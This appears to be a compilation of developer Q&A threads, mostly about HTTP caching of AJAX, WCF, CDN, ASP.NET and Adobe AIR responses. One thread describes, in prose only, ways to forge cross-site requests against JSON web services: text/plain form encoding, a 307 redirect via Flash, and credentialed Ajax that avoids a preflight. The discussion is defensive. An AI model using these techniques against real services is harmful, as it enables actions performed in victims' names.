I have a JavaScript app that sends requests to REST API, the responses from server have cache headers (like ETag, cache-control, expires). Is caching of responses in browser automatic, or the app must implement some sort of mechanism to save the data?
An AJAX request is no different from a normal request - it's a GET/POST/HEAD/whatever request being sent by the browser, and it is handled as such. This is confirmed here:
The HTTP and Cache sub-systems of modern browsers are at a much lower level than Ajax’s XMLHttpRequest object. At this level, the browser doesn’t know or care about Ajax requests. It simply obeys the normal HTTP caching rules based on the response headers returned from the server.
As per the jQuery documentation, caches can also be invalidated in at least one usual way (appending a query string):
cache (default: true, false for dataType 'script' and 'jsonp')
Type: Boolean
If set to false, it will force requested pages not to be cached by the browser. Note: Setting cache to false will only work correctly with HEAD and GET requests. It works by appending "_={timestamp}" to the GET parameters. The parameter is not needed for other types of requests, except in IE8 when a POST is made to a URL that has already been requested by a GET.
So in short, given the same headers, AJAX responses are cached the same way as other requests.
Browser handles automatically cache of resources. What you seem to be asking about is the actuall response from the server.
You will need to set that up yourself in your application. You can do so both on front-end and backend.
Most of JS frameworks have cache control implemented, for example:
jQuery
$.ajaxSetup({
// Disable caching of AJAX responses
cache: false
});
AngularJS
$http.defaults.cache = false;
etc.
On backend it really depends on what language you using, what server engine etc.
Checkout Memcached for example
http://memcached.org/
As with anything with web development there are odd things here and there, for example some IE versions are automatically chaching requests and you have to add unique id to the url to prevent that.
From https://developer.mozilla.org/en-US/docs/AJAX/Getting_Started :
Note 2: If you do not set header Cache-Control: no-cache the browser will cache the response and never re-submit the request, making debugging "challenging." You can also append an always-diferent aditional GET parameter, like the timestamp or a random number (see bypassing the cache)
Browser should handle the cache automatically.
Check this article, there's only clear cache method for javascript.
https://developer.chrome.com/extensions/browsingData
If the server sends the response with any of cache headers browsers should respect it. there is no difference between resources or ajax requests.
also you can specify cache headers in your ajax calls to make it not use caches and fetch the whole response from the server.
Most modern browsers support browser caching because of the cache and expire headers
http://www.arlocarreon.com/blog/http/http-requests-and-your-browsers-cache/
There are 2 apects of an HTTP request that can qualify it for being cached:
- Specifc HTTP cache and expire headers
- A unique URL
Interesting read:
http://www.mobify.com/blog/beginners-guide-to-http-cache-headers/
Related
I am trying to implement a REST web service with WCF that supports both caching and Conditional GETs.
I implemented basic caching following the instructions in MSDN: Caching Support for WCF Web HTTP Services. That means adding an [AspNetCacheProfile("MyOutputCacheProfile")] attribute to each of my web methods and adding appropriate entries to web.config. That seems to work correctly: cached responses are returned when identical arguments are passed to the web methods.
Then I added support for Conditional GET by calculating an ETag value and setting that on the response like this:
WebOperationContext.Current.OutgoingResponse.SetETag(myETag);
That sorta works: I can see the ETag header in the response the first time I call the web method.
But here's the problem: The next time I invoke that web method with the same arguments, a cached response is returned, and the cached response does not include the ETag header. (If I wait until cache expiration, or disable caching entirely, then the ETag headers are returned properly.)
So, is there any way get the cached responses to include that ETag value?
Update: After some more study and experimentation, I find that doing this causes the ETag header to be included in all cached responses:
HttpContext.Current.Response.Cache.SetETag(myETag);
If I call that, then I don't need to call the associated WebOperationContext...SetETag() operation to make everything work.
Is this the Right Way to do this?
Correct me if I am wrong. Restful service are more close to Http and Http caching says that
The goal of caching in HTTP/1.1 is to eliminate the need to send
requests in many cases, and to eliminate the need to send full
responses in many other cases. The former reduces the number of
network round-trips required for many operations; we use an
"expiration" mechanism for this purpose (see section 13.2). The latter
reduces network bandwidth requirements; we use a "validation"
mechanism for this purpose (see section 13.3).
Asp.net caching does not fall in any one of this category(neither expiration nor validation).The caching is only done on web server and IIS instead of executing the method, sends the stored response. Some how it does not fit in RESTful model.
To implement caching, we should add Cache Control Headers and Etag to response headers and then try to handle conditional Get. Please consult this excellent article.
I am building a web service that exclusively uses JSON for its request and response content (i.e., no form encoded payloads).
Is a web service vulnerable to CSRF attack if the following are true?
Any POST request without a top-level JSON object, e.g., {"foo":"bar"}, will be rejected with a 400. For example, a POST request with the content 42 would be thus rejected.
Any POST request with a content-type other than application/json will be rejected with a 400. For example, a POST request with content-type application/x-www-form-urlencoded would be thus rejected.
All GET requests will be Safe, and thus not modify any server-side data.
Clients are authenticated via a session cookie, which the web service gives them after they provide a correct username/password pair via a POST with JSON data, e.g. {"username":"user#example.com", "password":"my password"}.
Ancillary question: Are PUT and DELETE requests ever vulnerable to CSRF? I ask because it seems that most (all?) browsers disallow these methods in HTML forms.
EDIT: Added item #4.
EDIT: Lots of good comments and answers so far, but no one has offered a specific CSRF attack to which this web service is vulnerable.
Forging arbitrary CSRF requests with arbitrary media types is effectively only possible with XHR, because a form’s method is limited to GET and POST and a form’s POST message body is also limited to the three formats application/x-www-form-urlencoded, multipart/form-data, and text/plain. However, with the form data encoding text/plain it is still possible to forge requests containing valid JSON data.
So the only threat comes from XHR-based CSRF attacks. And those will only be successful if they are from the same origin, so basically from your own site somehow (e. g. XSS). Be careful not to mistake disabling CORS (i.e. not setting Access-Control-Allow-Origin: *) as a protection. CORS simply prevents clients from reading the response. The whole request is still sent and processed by the server.
Yes, it is possible. You can setup an attacker server which will send back a 307 redirect to the target server to the victim machine. You need to use flash to send the POST instead of using Form.
Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1436241
It also works on Chrome.
It is possible to do CSRF on JSON based Restful services using Ajax. I tested this on an application (using both Chrome and Firefox).
You have to change the contentType to text/plain and the dataType to JSON in order to avaoid a preflight request. Then you can send the request, but in order to send sessiondata, you need to set the withCredentials flag in your ajax request.
I discuss this in more detail here (references are included):
http://wsecblog.blogspot.be/2016/03/csrf-with-json-post-via-ajax.html
I have some doubts concerning point 3. Although it can be considered safe as it does not alter the data on the server side, the data can still be read, and the risk is that they can be stolen.
http://haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerability.aspx/
Is a web service vulnerable to CSRF attack if the following are true?
Yes. It's still HTTP.
Are PUT and DELETE requests ever vulnerable to CSRF?
Yes
it seems that most (all?) browsers disallow these methods in HTML forms
Do you think that a browser is the only way to make an HTTP request?
My images are stored in azure blob storage and referenced through my web application using my azure CDN. However all images return a 304 response header. Ideally I dont want the browser to return to the CDN to check for validity at every request, instead for the browser to always use the cache. - Well for at the life of the image cache.
With my limited knowledge of Caching, I understand that the cache uses the ETag value to compare if the version of the image is the same when requested. In this case it is and the CDN returns a 304 response. But because the CacheControl header is set as public, max-age=2592000 I would hope the browser would use the cached copy of the image. I have another CDN setup that has a hosted service endpoint which returns a 200 response because I remove the ETag value.
Any help with this would be greatly appreciated.
When ETag "triggers" 304 response => the browser has sent If-None-Match validating request to the server. This is normally done after max-age has elapsed. You could find a good description of this here:
https://stackoverflow.com/a/500103/2550808
it is also worth mentioning, Firefox browser settings should be set to default: go to about:config page and check this settings: http://kb.mozillazine.org/Browser.cache.check_doc_frequency
Going back to your question, something might be wrong with Cache-Control header the server returns to the browser. In my modest personal experience I didn't encounter explicitly public version of the header, it would be more likely just this:
Cache-Control: max-age=3600, must-revalidate
Anyway, here is pretty good description of headers pertaining to caching:
https://www.mnot.net/cache_docs/
Alternatively, there might be other reasons for incessant re-validation to consider:
VARY headers in server's 200 response with the file may affect caching;
JavaScript calling reload on the location object, passing TRUE for bReloadSource;
Can anyone break down what these two methods do at a HTTP level.
We are dealing with Akamai edge-caching and have been told that SetNoStore() will cause can exclusion so that (for example) form pages will always post back to the origin server. According to {guy} this sets the HTTP header:
Cache-Control: "no-cache, no-store"
As I was implementing this change to our forms I found SetNoServerCaching(). Well that seems to make a bit more sense semantically, and the documentation says "Explicitly denies caching of the document on the origin-server."
So I went down to the sea sea sea to see what I could see see see. I tried both of these methods and reviewed the headers in Firebug and Fiddler.
And from what I can tell, both these method set the exact same Http Header.
Can anyone explain if there are actual differences between these methods and if so, where are hiding in the http response?!
Theres a few differences,
SetNoStore, essentially stops the browser (and any network resource such as a CDN) from saving any part of the response or request, that includes saving to temp files. This will set the NO-STORE HTTP 1.1 header
SetNoServerCaching, will essentially stop the server from saving files, in ASP.NET There are several levels of caching that can happen, Data only, Partial Requests, Full Pages, and SQL Data. This call should stop the HTTP (Full and Partial) requests being saved on the server. This method should not set the cache-control headers or no-store or no cache.
There is also
Response.Cache.SetCacheability(HttpCacheability.Public);
Response.Cache.SetMaxAge(new TimeSpan(1, 0, 0));
as a possible way of setting cache, this will set the content-expires header.
For a CDN you probably want to set the content-expires header so that he CDN knows when to fetch new content, it if it gets a HIT. You probably don't want no-cache or no-store as this would cause a refetch on every HIT so essentially you are nullifying any benefit the CDN brings to you except they may have a faster backbone connection to the end user than your current ISP but that would be marginal.
Differnce between the two is
HttpCachePolicy.SetNoStore() or Response.Cache.SetNoStore:
Prevents the browser from caching the ASPX page.
HttpCachePolicy.SetNoServerCaching or Response.Cache.SetNoServerCaching:
Stops all origin-server caching for the current response. Explicitly denies caching of the document on the origin-server. Once set, all requests for the document are fully processed.
When these methods are invoked, caching cannot be reenabled for the current response.
I'm currently working on a project that needs to request a url multiple times. Having studied the the HTTP Proxy (Charles) it seems that AIR will cache the first response and then return the same response for each subsequent request.
Does anybody know how to know if the response has been cached other than setting the URLRequest to useCache, but this doesn't say if the response was a cached response or not. The digest isn't set on the URLRequest either, although it does mention this is for swz only, so how does it know if the content is the current content or not? Is the responseHeaders used to find out how long to hold the cache i.e.
Cache-Control: max-age=900
Also does anyone know how to flush/purge the cache or are we at the whim of the GC and in that case how does it know if to leave it in the cache or now?
This makes sense to me, but still I would like to know how to regulate this cache.
Further more: I've tested a set up where parallel URLLoaders (10) are made and created which open the same url to see what happens in that instance. It seems that each parallel request is made until a successful response is given, all subsequent calls are then cached. Calls which are sent out before the successful request is then completed. It looks like the items which are already in being processed do not use the cache and return with correct data.
Additional The AIR runtime doesn't even send a "If-Modified-Since" header, so the cache isn't even honoring HTTP protocol. So it seems as if Adobe has implemented it's own version of a cache which doesn't even use HTTP/1.1 Header Field Definitions. Perfect.
Thanks for any help.
Simon
From the documentation of URLRequest class, it seems that it uses Operating System's HTTP Cache. On a windows 7 OS, it seems that it is using IE's cache.
You can use a HTTP monitor tool like Fiddler, and verify this.
First request is 200, and subsequent requests are 304. After clearing the IE cache. and run the application again, You can see that it results in a HTTP 200 status.